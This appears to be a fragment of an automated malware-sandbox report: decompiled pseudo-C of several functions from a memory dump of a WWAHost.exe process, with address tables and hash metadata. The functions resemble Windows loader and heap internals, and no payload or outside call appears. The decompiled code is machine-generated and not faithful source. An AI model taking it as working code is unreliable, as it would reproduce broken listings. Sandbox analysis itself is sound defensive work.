                                              									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                              									goto L17;
                                              								}
                                              								 *_t235 = _t236;
                                              								_t165 = 0x10 + _t163 * 0xc;
                                              								__eflags = _t165;
                                              								_push(_t165);
                                              								_push(_t235);
                                              								_push(0x23);
                                              								_push(0xffffffff);
                                              								_t193 = E039996C0();
                                              								goto L19;
                                              							} else {
                                              								goto L50;
                                              							}
                                              						}
                                              						_t235 = _t237 - 0x38;
                                              						 *(_t237 - 0x60) = _t235;
                                              						goto L8;
                                              					}
                                              					goto L4;
                                              				}
                                              			}
                                              0x039b9bbf
                                              0x039b9bc4
                                              0x039b9bc8
                                              0x039b9bce
                                              0x039b9bce
                                              0x03968671
                                              0x03968671
                                              0x03968674
                                              0x03968676
                                              0x039b9bae
                                              0x039b9bae
                                              0x03968676
                                              0x0396867c
                                              0x0396867e
                                              0x03968688
                                              0x03968688
                                              0x00000000
                                              0x0396867e
                                              0x03968638
                                              0x03968638
                                              0x0396863b
                                              0x0396863e
                                              0x0396863f
                                              0x03968642
                                              0x03968645
                                              0x03968648
                                              0x0396864d
                                              0x039b9b69
                                              0x039b9b6e
                                              0x039b9b7b
                                              0x039b9b81
                                              0x039b9b85
                                              0x039b9b89
                                              0x039b9ba7
                                              0x039b9b8b
                                              0x039b9b91
                                              0x039b9b9a
                                              0x039b9b9f
                                              0x039b9b9f
                                              0x03968788
                                              0x0396878d
                                              0x03968763
                                              0x03968763
                                              0x03968766
                                              0x00000000
                                              0x03968766
                                              0x039b9b70
                                              0x00000000
                                              0x039b9b70
                                              0x03968656
                                              0x0396865a
                                              0x0396865c
                                              0x03968752
                                              0x03968756
                                              0x00000000
                                              0x00000000
                                              0x0396875e
                                              0x00000000
                                              0x0396875e
                                              0x03968662
                                              0x03968662
                                              0x03968662
                                              0x03968666
                                              0x00000000
                                              0x03968666
                                              0x039685b7
                                              0x039685b9
                                              0x039685bc
                                              0x039685bf
                                              0x039685cc
                                              0x039685d1
                                              0x039685d4
                                              0x039685db
                                              0x039685de
                                              0x039685e0
                                              0x039b9b5f
                                              0x00000000
                                              0x039b9b5f
                                              0x039685e6
                                              0x039685ea
                                              0x039686c3
                                              0x039686c5
                                              0x039686c8
                                              0x039686ca
                                              0x039b9b16
                                              0x00000000
                                              0x039b9b16
                                              0x039686d6
                                              0x039685f6
                                              0x039685f6
                                              0x039685f9
                                              0x03968602
                                              0x03968606
                                              0x0396860a
                                              0x0396860b
                                              0x0396860e
                                              0x03968611
                                              0x00000000
                                              0x03968611
                                              0x039685f3
                                              0x00000000
                                              0x039685f3
                                              0x03968619
                                              0x0396861e
                                              0x0396861e
                                              0x03968621
                                              0x03968622
                                              0x03968623
                                              0x03968625
                                              0x0396862c
                                              0x00000000
                                              0x0396873d
                                              0x00000000
                                              0x0396873d
                                              0x03968737
                                              0x0396850f
                                              0x03968512
                                              0x00000000
                                              0x03968512
                                              0x00000000
                                              0x039684d6

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3467978bec567979327d4eef9428eaa82d51da27bd6c2d54636fbfbf6cb173c9
                                              • Instruction ID: 7adc634a5446b70450801ea38d07fce13e00dc7db7fa326df3c8fc642320a88c
                                              • Opcode Fuzzy Hash: 3467978bec567979327d4eef9428eaa82d51da27bd6c2d54636fbfbf6cb173c9
                                              • Instruction Fuzzy Hash: 6EB19DB4E05359DFDB14EFA8C980AADFBB9FF88304F14452AE506AB245D771A842CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 67%
                                              			E0398513A(intOrPtr __ecx, void* __edx) {
                                              				signed int _v8;
                                              				signed char _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				intOrPtr _v44;
                                              				intOrPtr _v48;
                                              				char _v63;
                                              				char _v64;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed char* _v92;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				char _v105;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* _t157;
                                              				signed int _t159;
                                              				signed int _t160;
                                              				unsigned int* _t161;
                                              				intOrPtr _t165;
                                              				signed int _t172;
                                              				signed char* _t181;
                                              				intOrPtr _t189;
                                              				intOrPtr* _t200;
                                              				signed int _t202;
                                              				signed int _t203;
                                              				char _t204;
                                              				signed int _t207;
                                              				signed int _t208;
                                              				void* _t209;
                                              				intOrPtr _t210;
                                              				signed int _t212;
                                              				signed int _t214;
                                              				signed int _t221;
                                              				signed int _t222;
                                              				signed int _t226;
                                              				intOrPtr* _t232;
                                              				signed int _t233;
                                              				signed int _t234;
                                              				intOrPtr _t237;
                                              				intOrPtr _t238;
                                              				intOrPtr _t240;
                                              				void* _t245;
                                              				signed int _t246;
                                              				signed int _t247;
                                              				void* _t248;
                                              				void* _t251;
                                              				void* _t252;
                                              				signed int _t253;
                                              				signed int _t255;
                                              				signed int _t256;
                                              
                                              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                              				_v8 =  *0x3a4d360 ^ _t255;
                                              				_v32 = _v32 & 0x00000000;
                                              				_t251 = __edx;
                                              				_t237 = __ecx;
                                              				_t212 = 6;
                                              				_t245 =  &_v84;
                                              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                              				_v48 = __ecx;
                                              				_v36 = _t207;
                                              				_t157 = memset(_t245, 0, _t212 << 2);
                                              				_t256 = _t255 + 0xc;
                                              				_t246 = _t245 + _t212;
                                              				if(_t207 == 2) {
                                              					_t247 =  *(_t237 + 0x60);
                                              					_t208 =  *(_t237 + 0x64);
                                              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                              					_v104 = _t159;
                                              					_v76 = _t159;
                                              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                              					_v100 = _t160;
                                              					_v72 = _t160;
                                              					L19:
                                              					_v80 = _t208;
                                              					_v84 = _t247;
                                              					L8:
                                              					_t214 = 0;
                                              					if( *(_t237 + 0x74) > 0) {
                                              						_t82 = _t237 + 0x84; // 0x124
                                              						_t161 = _t82;
                                              						_v92 = _t161;
                                              						while( *_t161 >> 0x1f != 0) {
                                              							_t200 = _v92;
                                              							if( *_t200 == 0x80000000) {
                                              								break;
                                              							}
                                              							_t214 = _t214 + 1;
                                              							_t161 = _t200 + 0x10;
                                              							_v92 = _t161;
                                              							if(_t214 <  *(_t237 + 0x74)) {
                                              								continue;
                                              							}
                                              							goto L9;
                                              						}
                                              						_v88 = _t214 << 4;
                                              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                              						_t165 = 0;
                                              						asm("adc eax, [ecx+edx+0x7c]");
                                              						_v24 = _t165;
                                              						_v28 = _v40;
                                              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                              						_t221 = _v40;
                                              						_v16 =  *_v92;
                                              						_v32 =  &_v28;
                                              						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                              							goto L9;
                                              						}
                                              						_t240 = _v48;
                                              						if( *_v92 != 0x80000000) {
                                              							goto L9;
                                              						}
                                              						 *((intOrPtr*)(_t221 + 8)) = 0;
                                              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                              						_t226 = 0;
                                              						_t181 = _t251 + 0x66;
                                              						_v88 = 0;
                                              						_v92 = _t181;
                                              						do {
                                              							if( *((char*)(_t181 - 2)) == 0) {
                                              								goto L31;
                                              							}
                                              							_t226 = _v88;
                                              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                              								_t181 = E0399D0F0(1, _t226 + 0x20, 0);
                                              								_t226 = _v40;
                                              								 *(_t226 + 8) = _t181;
                                              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                              								L34:
                                              								if(_v44 == 0) {
                                              									goto L9;
                                              								}
                                              								_t210 = _v44;
                                              								_t127 = _t210 + 0x1c; // 0x1c
                                              								_t249 = _t127;
                                              								E03972280(_t181, _t127);
                                              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                              								}
                                              								_t189 = L03974620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                              								if(_t189 != 0) {
                                              									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                              									 *_t232 = _t232 + 0x10;
                                              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                              									E0399F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                              									_t256 = _t256 + 0xc;
                                              								}
                                              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                              								E0396FFB0(_t210, _t249, _t249);
                                              								_t222 = _v76;
                                              								_t172 = _v80;
                                              								_t208 = _v84;
                                              								_t247 = _v88;
                                              								L10:
                                              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                              								_v44 = _t238;
                                              								if(_t238 != 0) {
                                              									 *0x3a4b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                              									_v44();
                                              								}
                                              								_pop(_t248);
                                              								_pop(_t252);
                                              								_pop(_t209);
                                              								return E0399B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                              							}
                                              							_t181 = _v92;
                                              							L31:
                                              							_t226 = _t226 + 1;
                                              							_t181 =  &(_t181[0x18]);
                                              							_v88 = _t226;
                                              							_v92 = _t181;
                                              						} while (_t226 < 4);
                                              						goto L34;
                                              					}
                                              					L9:
                                              					_t172 = _v104;
                                              					_t222 = _v100;
                                              					goto L10;
                                              				}
                                              				_t247 = _t246 | 0xffffffff;
                                              				_t208 = _t247;
                                              				_v84 = _t247;
                                              				_v80 = _t208;
                                              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                              					_t233 = _v72;
                                              					_v105 = _v64;
                                              					_t202 = _v76;
                                              				} else {
                                              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                              					_v105 = 1;
                                              					if(_v63 <= _t204) {
                                              						_v63 = _t204;
                                              					}
                                              					_t202 = _v76 |  *(_t251 + 0x40);
                                              					_t233 = _v72 |  *(_t251 + 0x44);
                                              					_t247 =  *(_t251 + 0x38);
                                              					_t208 =  *(_t251 + 0x3c);
                                              					_v76 = _t202;
                                              					_v72 = _t233;
                                              					_v84 = _t247;
                                              					_v80 = _t208;
                                              				}
                                              				_v104 = _t202;
                                              				_v100 = _t233;
                                              				if( *((char*)(_t251 + 0xc4)) != 0) {
                                              					_t237 = _v48;
                                              					_v105 = 1;
                                              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                              						_t237 = _v48;
                                              					}
                                              					_t203 = _t202 |  *(_t251 + 0xb8);
                                              					_t234 = _t233 |  *(_t251 + 0xbc);
                                              					_t247 = _t247 &  *(_t251 + 0xb0);
                                              					_t208 = _t208 &  *(_t251 + 0xb4);
                                              					_v104 = _t203;
                                              					_v76 = _t203;
                                              					_v100 = _t234;
                                              					_v72 = _t234;
                                              					_v84 = _t247;
                                              					_v80 = _t208;
                                              				}
                                              				if(_v105 == 0) {
                                              					_v36 = _v36 & 0x00000000;
                                              					_t208 = 0;
                                              					_t247 = 0;
                                              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                              					goto L19;
                                              				} else {
                                              					_v36 = 1;
                                              					goto L8;
                                              				}
                                              			}

                                              0x039c6f93
                                              0x039c6f98
                                              0x039c6fa0
                                              0x039c6fa6
                                              0x039c6fb3
                                              0x039c6fb6
                                              0x039c6fbf
                                              0x039c6fc1
                                              0x039c6fd5
                                              0x039c6fda
                                              0x039c6fda
                                              0x039c6fdd
                                              0x039c6fe2
                                              0x039c6fe7
                                              0x039c6feb
                                              0x039c6fef
                                              0x039c6ff3
                                              0x0398520c
                                              0x0398520c
                                              0x0398520f
                                              0x03985215
                                              0x03985234
                                              0x0398523a
                                              0x0398523a
                                              0x03985244
                                              0x03985245
                                              0x03985246
                                              0x03985251
                                              0x03985251
                                              0x039c6f13
                                              0x039c6f17
                                              0x039c6f17
                                              0x039c6f18
                                              0x039c6f1b
                                              0x039c6f1f
                                              0x039c6f23
                                              0x00000000
                                              0x039c6f28
                                              0x03985204
                                              0x03985204
                                              0x03985208
                                              0x00000000
                                              0x03985208
                                              0x03985185
                                              0x03985188
                                              0x0398518a
                                              0x0398518e
                                              0x03985195
                                              0x039c6db1
                                              0x039c6db5
                                              0x039c6db9
                                              0x0398519b
                                              0x0398519b
                                              0x0398519e
                                              0x039851a7
                                              0x039851a9
                                              0x039851a9
                                              0x039851b5
                                              0x039851b8
                                              0x039851bb
                                              0x039851be
                                              0x039851c1
                                              0x039851c5
                                              0x039851c9
                                              0x039851cd
                                              0x039851cd
                                              0x039851d8
                                              0x039851dc
                                              0x039851e0
                                              0x039c6dcc
                                              0x039c6dd0
                                              0x039c6dd5
                                              0x039c6ddd
                                              0x039c6de1
                                              0x039c6de1
                                              0x039c6de5
                                              0x039c6deb
                                              0x039c6df1
                                              0x039c6df7
                                              0x039c6dfd
                                              0x039c6e01
                                              0x039c6e05
                                              0x039c6e09
                                              0x039c6e0d
                                              0x039c6e11
                                              0x039c6e11
                                              0x039851eb
                                              0x039c6e1a
                                              0x039c6e1f
                                              0x039c6e21
                                              0x039c6e23
                                              0x00000000
                                              0x039851f1
                                              0x039851f1
                                              0x00000000
                                              0x039851f1

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b849721599fe4776884c17da7c6fe7733b6a3e3c843a8eee0c789027a12b6b3
                                              • Instruction ID: c2f9be094b0dc0272205b4b8ad909e4324472bea0b09f5e8abdbed05eaf579ce
                                              • Opcode Fuzzy Hash: 4b849721599fe4776884c17da7c6fe7733b6a3e3c843a8eee0c789027a12b6b3
                                              • Instruction Fuzzy Hash: F2C121755083809FD354CF28C580A6AFBF1BF89344F188A6EF8998B392D771E945CB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 74%
                                              			E039803E2(signed int __ecx, signed int __edx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				char _v52;
                                              				char _v56;
                                              				char _v64;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t56;
                                              				signed int _t58;
                                              				char* _t64;
                                              				intOrPtr _t65;
                                              				signed int _t74;
                                              				signed int _t79;
                                              				char* _t83;
                                              				intOrPtr _t84;
                                              				signed int _t93;
                                              				signed int _t94;
                                              				signed char* _t95;
                                              				signed int _t99;
                                              				signed int _t100;
                                              				signed char* _t101;
                                              				signed int _t105;
                                              				signed int _t119;
                                              				signed int _t120;
                                              				void* _t122;
                                              				signed int _t123;
                                              				signed int _t127;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t127;
                                              				_t119 = __ecx;
                                              				_t105 = __edx;
                                              				_t118 = 0;
                                              				_v20 = __edx;
                                              				_t120 =  *(__ecx + 0x20);
                                              				if(E03980548(__ecx, 0) != 0) {
                                              					_t56 = 0xc000022d;
                                              					L23:
                                              					return E0399B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                              				} else {
                                              					_v12 = _v12 | 0xffffffff;
                                              					_t58 = _t120 + 0x24;
                                              					_t109 =  *(_t120 + 0x18);
                                              					_t118 = _t58;
                                              					_v16 = _t58;
                                              					E0396B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                              					_v52 = 0x18;
                                              					_v48 = 0;
                                              					0x840 = 0x40;
                                              					if( *0x3a47c1c != 0) {
                                              					}
                                              					_v40 = 0x840;
                                              					_v44 = _t105;
                                              					_v36 = 0;
                                              					_v32 = 0;
                                              					if(E03977D50() != 0) {
                                              						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              					} else {
                                              						_t64 = 0x7ffe0384;
                                              					}
                                              					if( *_t64 != 0) {
                                              						_t65 =  *[fs:0x30];
                                              						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                              						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                              							_t100 = E03977D50();
                                              							__eflags = _t100;
                                              							if(_t100 == 0) {
                                              								_t101 = 0x7ffe0385;
                                              							} else {
                                              								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              							}
                                              							__eflags =  *_t101 & 0x00000020;
                                              							if(( *_t101 & 0x00000020) != 0) {
                                              								_t118 = _t118 | 0xffffffff;
                                              								_t109 = 0x1485;
                                              								E039D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                              							}
                                              						}
                                              					}
                                              					_t105 = 0;
                                              					while(1) {
                                              						_push(0x60);
                                              						_push(5);
                                              						_push( &_v64);
                                              						_push( &_v52);
                                              						_push(0x100021);
                                              						_push( &_v12);
                                              						_t122 = E03999830();
                                              						if(_t122 >= 0) {
                                              							break;
                                              						}
                                              						__eflags = _t122 - 0xc0000034;
                                              						if(_t122 == 0xc0000034) {
                                              							L38:
                                              							_t120 = 0xc0000135;
                                              							break;
                                              						}
                                              						__eflags = _t122 - 0xc000003a;
                                              						if(_t122 == 0xc000003a) {
                                              							goto L38;
                                              						}
                                              						__eflags = _t122 - 0xc0000022;
                                              						if(_t122 != 0xc0000022) {
                                              							break;
                                              						}
                                              						__eflags = _t105;
                                              						if(__eflags != 0) {
                                              							break;
                                              						}
                                              						_t109 = _t119;
                                              						_t99 = E039D69A6(_t119, __eflags);
                                              						__eflags = _t99;
                                              						if(_t99 == 0) {
                                              							break;
                                              						}
                                              						_t105 = _t105 + 1;
                                              					}
                                              					if( !_t120 >= 0) {
                                              						L22:
                                              						_t56 = _t120;
                                              						goto L23;
                                              					}
                                              					if( *0x3a47c04 != 0) {
                                              						_t118 = _v12;
                                              						_t120 = E039DA7AC(_t119, _t118, _t109);
                                              						__eflags = _t120;
                                              						if(_t120 >= 0) {
                                              							goto L10;
                                              						}
                                              						__eflags =  *0x3a47bd8;
                                              						if( *0x3a47bd8 != 0) {
                                              							L20:
                                              							if(_v12 != 0xffffffff) {
                                              								_push(_v12);
                                              								E039995D0();
                                              							}
                                              							goto L22;
                                              						}
                                              					}
                                              					L10:
                                              					_push(_v12);
                                              					_t105 = _t119 + 0xc;
                                              					_push(0x1000000);
                                              					_push(0x10);
                                              					_push(0);
                                              					_push(0);
                                              					_push(0xf);
                                              					_push(_t105);
                                              					_t120 = E039999A0();
                                              					if(_t120 < 0) {
                                              						__eflags = _t120 - 0xc000047e;
                                              						if(_t120 == 0xc000047e) {
                                              							L51:
                                              							_t74 = E039D3540(_t120);
                                              							_t119 = _v16;
                                              							_t120 = _t74;
                                              							L52:
                                              							_t118 = 0x1485;
                                              							E0395B1E1(_t120, 0x1485, 0, _t119);
                                              							goto L20;
                                              						}
                                              						__eflags = _t120 - 0xc000047f;
                                              						if(_t120 == 0xc000047f) {
                                              							goto L51;
                                              						}
                                              						__eflags = _t120 - 0xc0000462;
                                              						if(_t120 == 0xc0000462) {
                                              							goto L51;
                                              						}
                                              						_t119 = _v16;
                                              						__eflags = _t120 - 0xc0000017;
                                              						if(_t120 != 0xc0000017) {
                                              							__eflags = _t120 - 0xc000009a;
                                              							if(_t120 != 0xc000009a) {
                                              								__eflags = _t120 - 0xc000012d;
                                              								if(_t120 != 0xc000012d) {
                                              									_v28 = _t119;
                                              									_push( &_v56);
                                              									_push(1);
                                              									_v24 = _t120;
                                              									_push( &_v28);
                                              									_push(1);
                                              									_push(2);
                                              									_push(0xc000007b);
                                              									_t79 = E0399AAF0();
                                              									__eflags = _t79;
                                              									if(_t79 >= 0) {
                                              										__eflags =  *0x3a48474 - 3;
                                              										if( *0x3a48474 != 3) {
                                              											 *0x3a479dc =  *0x3a479dc + 1;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L52;
                                              					}
                                              					if(E03977D50() != 0) {
                                              						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              					} else {
                                              						_t83 = 0x7ffe0384;
                                              					}
                                              					if( *_t83 != 0) {
                                              						_t84 =  *[fs:0x30];
                                              						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                              						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                              							_t94 = E03977D50();
                                              							__eflags = _t94;
                                              							if(_t94 == 0) {
                                              								_t95 = 0x7ffe0385;
                                              							} else {
                                              								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              							}
                                              							__eflags =  *_t95 & 0x00000020;
                                              							if(( *_t95 & 0x00000020) != 0) {
                                              								E039D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                              							}
                                              						}
                                              					}
                                              					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                              						if( *0x3a48708 != 0) {
                                              							_t118 =  *0x7ffe0330;
                                              							_t123 =  *0x3a47b00; // 0x0
                                              							asm("ror esi, cl");
                                              							 *0x3a4b1e0(_v12, _v20, 0x20);
                                              							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                              							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                              							asm("sbb esi, esi");
                                              							_t120 =  ~_t50 & _t93;
                                              						} else {
                                              							_t120 = 0;
                                              						}
                                              					}
                                              					if( !_t120 >= 0) {
                                              						L19:
                                              						_push( *_t105);
                                              						E039995D0();
                                              						 *_t105 =  *_t105 & 0x00000000;
                                              						goto L20;
                                              					}
                                              					_t120 = E03967F65(_t119);
                                              					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                              						__eflags = _t120;
                                              						if(_t120 < 0) {
                                              							goto L19;
                                              						}
                                              						 *(_t119 + 0x64) = _v12;
                                              						goto L22;
                                              					}
                                              					goto L19;
                                              				}
                                              			}








































                                              0x039804bf
                                              0x039804c5
                                              0x039804c9
                                              0x039c4d53
                                              0x039c4d59
                                              0x039c4db9
                                              0x039c4dba
                                              0x039c4dbf
                                              0x039c4dc2
                                              0x039c4dc4
                                              0x039c4dc7
                                              0x039c4dce
                                              0x00000000
                                              0x039c4dce
                                              0x039c4d5b
                                              0x039c4d61
                                              0x00000000
                                              0x00000000
                                              0x039c4d63
                                              0x039c4d69
                                              0x00000000
                                              0x00000000
                                              0x039c4d6b
                                              0x039c4d6e
                                              0x039c4d74
                                              0x039c4d76
                                              0x039c4d7c
                                              0x039c4d7e
                                              0x039c4d84
                                              0x039c4d89
                                              0x039c4d8c
                                              0x039c4d8d
                                              0x039c4d92
                                              0x039c4d95
                                              0x039c4d96
                                              0x039c4d98
                                              0x039c4d9a
                                              0x039c4d9f
                                              0x039c4da4
                                              0x039c4da6
                                              0x039c4da8
                                              0x039c4daf
                                              0x039c4db1
                                              0x039c4db1
                                              0x039c4daf
                                              0x039c4da6
                                              0x039c4d84
                                              0x039c4d7c
                                              0x00000000
                                              0x039c4d74
                                              0x039804d6
                                              0x039c4de1
                                              0x039804dc
                                              0x039804dc
                                              0x039804dc
                                              0x039804e4
                                              0x039c4deb
                                              0x039c4df1
                                              0x039c4df8
                                              0x039c4dfe
                                              0x039c4e03
                                              0x039c4e05
                                              0x039c4e17
                                              0x039c4e07
                                              0x039c4e10
                                              0x039c4e10
                                              0x039c4e1c
                                              0x039c4e1f
                                              0x039c4e35
                                              0x039c4e35
                                              0x039c4e1f
                                              0x039c4df8
                                              0x039804f1
                                              0x039804fa
                                              0x039c4e3f
                                              0x039c4e47
                                              0x039c4e5b
                                              0x039c4e61
                                              0x039c4e67
                                              0x039c4e69
                                              0x039c4e71
                                              0x039c4e73
                                              0x03980500
                                              0x03980500
                                              0x03980500
                                              0x039804fa
                                              0x03980508
                                              0x0398051d
                                              0x0398051d
                                              0x0398051f
                                              0x03980524
                                              0x00000000
                                              0x03980524
                                              0x03980515
                                              0x03980517
                                              0x039c4e7a
                                              0x039c4e7c
                                              0x00000000
                                              0x00000000
                                              0x039c4e85
                                              0x00000000
                                              0x039c4e85
                                              0x00000000
                                              0x03980517

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06ee2f568d1c443ae42660eff0b871fa4f172c0e3fea560f09b338acfa9a70f4
                                              • Instruction ID: 6e4f1885432418d7fc84d4fc2800674889d771c1c3c9e001e49a918ea409ceb0
                                              • Opcode Fuzzy Hash: 06ee2f568d1c443ae42660eff0b871fa4f172c0e3fea560f09b338acfa9a70f4
                                              • Instruction Fuzzy Hash: 4F913D35F40354AFEB22EB69C854BADBBA8EB81754F090265E911AB3D0E7749C04C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 67%
                                              			E0395C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                              				signed int _v8;
                                              				char _v1036;
                                              				signed int _v1040;
                                              				char _v1048;
                                              				signed int _v1052;
                                              				signed char _v1056;
                                              				void* _v1058;
                                              				char _v1060;
                                              				signed int _v1064;
                                              				void* _v1068;
                                              				intOrPtr _v1072;
                                              				void* _v1084;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr _t70;
                                              				intOrPtr _t72;
                                              				signed int _t74;
                                              				intOrPtr _t77;
                                              				signed int _t78;
                                              				signed int _t81;
                                              				void* _t101;
                                              				signed int _t102;
                                              				signed int _t107;
                                              				signed int _t109;
                                              				signed int _t110;
                                              				signed char _t111;
                                              				signed int _t112;
                                              				signed int _t113;
                                              				signed int _t114;
                                              				intOrPtr _t116;
                                              				void* _t117;
                                              				char _t118;
                                              				void* _t120;
                                              				char _t121;
                                              				signed int _t122;
                                              				signed int _t123;
                                              				signed int _t125;
                                              
                                              				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                              				_v8 =  *0x3a4d360 ^ _t125;
                                              				_t116 = _a4;
                                              				_v1056 = _a16;
                                              				_v1040 = _a24;
                                              				if(E03966D30( &_v1048, _a8) < 0) {
                                              					L4:
                                              					_pop(_t117);
                                              					_pop(_t120);
                                              					_pop(_t101);
                                              					return E0399B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                              				}
                                              				_t70 = _a20;
                                              				if(_t70 >= 0x3f4) {
                                              					_t121 = _t70 + 0xc;
                                              					L19:
                                              					_t107 =  *( *[fs:0x30] + 0x18);
                                              					__eflags = _t107;
                                              					if(_t107 == 0) {
                                              						L60:
                                              						_t68 = 0xc0000017;
                                              						goto L4;
                                              					}
                                              					_t72 =  *0x3a47b9c; // 0x0
                                              					_t74 = L03974620(_t107, _t107, _t72 + 0x180000, _t121);
                                              					_v1064 = _t74;
                                              					__eflags = _t74;
                                              					if(_t74 == 0) {
                                              						goto L60;
                                              					}
                                              					_t102 = _t74;
                                              					_push( &_v1060);
                                              					_push(_t121);
                                              					_push(_t74);
                                              					_push(2);
                                              					_push( &_v1048);
                                              					_push(_t116);
                                              					_t122 = E03999650();
                                              					__eflags = _t122;
                                              					if(_t122 >= 0) {
                                              						L7:
                                              						_t114 = _a12;
                                              						__eflags = _t114;
                                              						if(_t114 != 0) {
                                              							_t77 = _a20;
                                              							L26:
                                              							_t109 =  *(_t102 + 4);
                                              							__eflags = _t109 - 3;
